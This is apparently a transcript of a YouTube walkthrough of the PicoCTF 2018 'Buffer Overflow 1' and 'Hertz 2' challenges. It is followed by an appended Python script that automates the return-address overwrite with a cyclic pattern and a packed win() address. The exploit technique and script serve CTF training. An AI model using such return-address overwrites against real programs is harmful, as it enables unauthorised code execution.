Hey YouTube, John Hammond, PicoCTF 2018, Buffer Overflow 1. Okay, now you're cooking. This time you can overflow the buffer and return to the flag function in this program, sweet. We're given the program and the source code; we can download it, I've already wget it, but we'll have to run it on the shell server so we can actually receive their flag file, just as we've done before. So let's go check out what we've downloaded here. We have the source file, so let's look at vuln.c, check it out. It will define some macros here to kind of have a buffer size and flag size. We have a win function that will just print out the flag file, okay, looks like that's how we get the flag. And the vuln function is just running gets, which we know is a very dangerous function. We can check out man gets if we wanted to: man gets. And it says never use this function because it has significant security problems. So main sets up a buffer, raises our privileges so we can run on the server and get the flag, and then it runs the vulnerable function. So it'll jump to an address, and that's pretty cool, you can see this get return address thing. So that's neat. Let's go ahead and try and run this and see if we can work with it. Let's mark it as executable, ./vuln, "Please enter your string", awesome. And it says, okay, time to return, and it will jump back to where it expected to return to in the program. Like I wrote "please subscribe" or whatever stupid stuff, but we do want to try and overflow this, right? Given the actual buffer size, so 32 characters, you can see I entered a crap ton of A's and it says, okay, time to return, fingers crossed, we're jumping to this location. So if you didn't have this output, you can run dmesg and then actually get the very last couple of lines of it, and you can see where your segfault is happening and how much you've actually overflowed EIP, or the instruction pointer.
So you're overflowing the return address. As you've seen on the stack, we break through the local variables that we're receiving, we're going to end up overwriting EBP, and we're going to end up overwriting the return address, so EBP plus four on the stack, in the stack frame. So once we have a controllable return address, we can jump to whatever function we want. Let's go ahead and try and return to the win function. So first we need to know where that function is, and I'm going to use readelf -s to just view symbols on this binary here, and we can see we do have a function called win and it's at this location. So just as you saw when we ran it, when we ran vuln without anything big, we'll just jump to a location back in main, or the location where we were in main; we can also jump to the very start of win, and that's the exact same kind of style of where the constant is in the binary. So we can just set that in little-endian format and then go ahead and try to actually jump to it. But we need it in little-endian format, right? So you can do this with Python, or you could just kind of do it by hand, but Python has the struct module, which is installed by default, and you can use struct.pack with little endian, so a less-than sign, and a capital I for integer, and then you'll supply this as a hex number and you'll get some output that looks kind of random when you have it displayed in the terminal, but that's because it's just hex bytes. So if I print out the representation of it with repr, you can see it's the backslash x and the location in hex. So that's cool, right? Let's go ahead and try and find where our offset is, or where we can go ahead and overflow this and actually run the win function. So we would go ahead and python -c, where is that print statement?
Let's also do print "A" times, let's say, we know our buffer is like 32, so let's go maybe like 36 or 40, and let's add on that string and let's pipe that into vuln. And it says, okay, we're jumping to this location, maybe we didn't override it just enough. 44, and we jumped straight to the location that we wanted to, and we know that because it's trying to cat out the flag file. Since we're testing locally, if we wanted to, we could create our own fake flag, and I do this a lot. I'll be like, "John, please subscribe" or like "John wins" or like "John got the challenge" or whatever, and it will print out our local fake flag. So that's a cool way to do it. Now that we know we have this payload that will work, let's go ahead and try and connect to the server. So what I'm going to do is actually create a simple SSH script that will get me to where I want to be every time, and I won't have to try and like type the same SSH command every time. I just want the 2018 Pico shell, and let's create, in the above directory, just an ssh.sh script. I still want to be able to enter my password. Whoa, I didn't want that. I wanted this: SSH, John Hammond YouTube there, and let's keep this back in our clipboard. Mark that as executable, and now that we can connect to it, we'll enter our password, we're logged in. Let's get this just kind of in our directory, or just output it, so when I go back to the actual problems page I can copy and paste it pretty easily. Let's get to Buffer Overflow 1, and we'll get to this location on the file system, we'll just copy and paste it. So let's cd over there, right? Now let's run the same command that we had. It says, okay, time to return, fingers crossed. We have overflowed, and we've told the return address to instead be our win function, and it pumps out the flag because we've called the win function, just like that. Addresses are easy, slick. Let's do that, nano flag.txt, save it. Let's remove our cheesy "please subscribe" file.
Submit it, and that challenge is now complete. What a win. Let's mark that as complete. Buffer Overflow 1, complete. Sweet. I am just gonna solve the next challenge because it's pretty simple. It's the identical same thing, like the same solution as the last Hertz challenge. Hertz 2 is another substitution cipher, right? Just as we saw in the last one. So let's make a directory, hertz2, go ahead and nc to it, get this string, and we can again just slap this into quipqiup and it works just fine for us. We will get the flag pretty easily. Substitution ciphers are easy. If you wanted to, we can get every other part of it and mark that and say what that is, and then it should know the rest of that string. It should be able to figure out what those question marks are, because the clues will allow us to just say "picoCTF substitution ciphers are too easy, let's solve it now." And then, now that it's able to figure out all those letters, it can get the rest of the flag. Kind of a cool trick. Stop refreshing so I can actually highlight this. Oh my goodness. I hope you guys are having fun. I hope these are as entertaining as they are educational, because I'm an idiot. That's all. All right, let's do nano flag.txt, save it, and we're good. Hertz 2, complete, and that's that. Thanks so much for watching, guys. Hope you enjoyed a little bit of buffer overflow, some cool stuff. I've done those a lot before in Ryan CTF, Ryan Nicholson CTF, and other competitions, so there are plenty of videos on it, but that's how we could just run through it for PicoCTF. All right, quick shout-out for the people that support me on Patreon. Thank you guys so much, I can't say it enough. $1 a month on Patreon will give you a special shout-out just like this at the end of every video. $5 or more on Patreon will give you early access to everything that is released on YouTube before it goes live. Thanks so much for watching.
If you did like this video, please do like, comment, and subscribe. Join our Discord server, link in the description. It's a cool community full of CTF players, programmers, and hackers. Hang out with me and a bunch of other cool people, learn a lot of stuff, and just kind of get engaged in the scene and the community. Thanks. Love you guys. Hope to see you in the next video. Hope to see you on Patreon. Take it easy.
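Added example, not code from the video or from the challenge: the Buffer Overflow 1 steps above (pack the win address little-endian with struct.pack, find the offset to the saved return address, send padding plus the address through gets) as one script. Instead of guessing 36, 40, 44 as in the video, it sends a cyclic pattern once, reads the overwritten return address back from either the program's own "Jumping to 0x..." line or a dmesg segfault line, and computes the offset from where those four bytes sit in the pattern. Assumptions: the local binary is ./vuln, it prints the return address in that "Jumping to 0x" form, and the win() address is whatever readelf -s reports on your copy; the WIN_ADDR value and the dmesg line in the comments are placeholders.

```python
import re
import string
import struct
import subprocess

# Assumed local path and placeholder win() address; read the real one from
# `readelf -s vuln | grep win` on your own copy of the binary.
TARGET = "./vuln"
WIN_ADDR = 0x080485CB

# Shape of the program's own output after the overflow (assumed from the video).
_JUMP_RE = re.compile(r"Jumping to 0x([0-9a-fA-F]+)")
# Shape of a kernel segfault line from dmesg, e.g. (constructed):
# "vuln[1234]: segfault at 41414141 ip 0000000041414141 sp ... error 6"
_DMESG_RE = re.compile(r"segfault at [0-9a-fA-F]+ ip ([0-9a-fA-F]+)")


def p32(addr):
    """Little-endian 4-byte packing, the struct.pack('<I', ...) from the video."""
    return struct.pack("<I", addr)


def cyclic(length):
    """Metasploit-style pattern Aa0Aa1Aa2...: every 4-byte window is unique in
    the first 20280 bytes, so the value that lands in EIP identifies its offset."""
    out = bytearray()
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for d in string.digits:
                out += (up + lo + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is not unique")


def parse_control_value(text):
    """Return the overwritten return address (int) from a 'Jumping to 0x...'
    line or a dmesg segfault line, or None if neither is present."""
    for rx in (_JUMP_RE, _DMESG_RE):
        m = rx.search(text)
        if m:
            return int(m.group(1), 16) & 0xFFFFFFFF
    return None


def find_offset(text, pattern):
    """Offset into `pattern` of the bytes that reached EIP, or -1 if unknown."""
    value = parse_control_value(text)
    if value is None:
        return -1
    return pattern.find(p32(value))


def build_payload(offset, target_addr):
    """Padding up to the saved return address, then the address to return to."""
    addr = p32(target_addr)
    if b"\n" in addr:
        # gets() stops reading at a newline, so such an address cannot be sent this way.
        raise ValueError("target address contains 0x0a; gets() would truncate it")
    return b"A" * offset + addr


def run_target(payload, path=TARGET):
    """Feed the payload on stdin and return stdout+stderr as text."""
    proc = subprocess.run([path], input=payload + b"\n",
                          stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    return proc.stdout.decode(errors="replace")


if __name__ == "__main__":
    # Stage 1: one pattern run tells us the offset instead of trial and error.
    pattern = cyclic(200)
    offset = find_offset(run_target(pattern), pattern)
    print("offset to saved return address:", offset)
    # Stage 2: overwrite the return address with win() and show what comes back.
    if offset >= 0:
        print(run_target(build_payload(offset, WIN_ADDR)))
```

Run it next to a local copy of the binary with a fake flag.txt in the same directory, as the video does, and it should print the fake flag once the offset is found; on the shell server only WIN_ADDR needs to match the server's binary. The newline check in build_payload matters because gets() ends the input at 0x0a, so an address with that byte in it cannot be delivered through this program.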